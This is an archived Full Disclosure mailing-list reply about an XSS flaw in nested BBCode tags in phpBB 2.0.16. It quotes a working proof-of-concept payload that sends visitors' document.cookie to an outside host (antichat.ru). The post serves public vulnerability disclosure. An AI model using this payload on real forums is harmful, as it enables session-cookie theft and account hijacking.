Full Disclosure mailing list archives

Re: XSS in nested tag in phpbb 2.0.16

From: Aaron Horst <anthrax101 () gmail com>
Date: Tue, 5 Jul 2005 16:48:50 -0400

Please forgive my redundant report, below. I forgot to flush my cached
copy of the FD list.

AnthraX101

On 7/5/05, alex <pigrelax () yandex ru> wrote:

Hi all!

Example:

[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'styl
e='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antic
hat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/u
rl][/url]'[/color]

More info:
http://www.securitylab.ru/55612.html

and

http://antichat.ru/txt/phpbb/

(In Russian)


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



-- 
AnthraX101 -- PGP Key ID# 0x4CD6D0BD
Fingerprint:
8161 D008 3DAB 86C1 2CA3  AEDE 0E21 DBDE 4CD6 D0BD
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

XSS in nested tag in phpbb 2.0.16 alex (Jul 05)
- Re: XSS in nested tag in phpbb 2.0.16 Aaron Horst (Jul 05)
- Re: XSS in nested tag in phpbb 2.0.16 Paul Laudanski (Jul 11)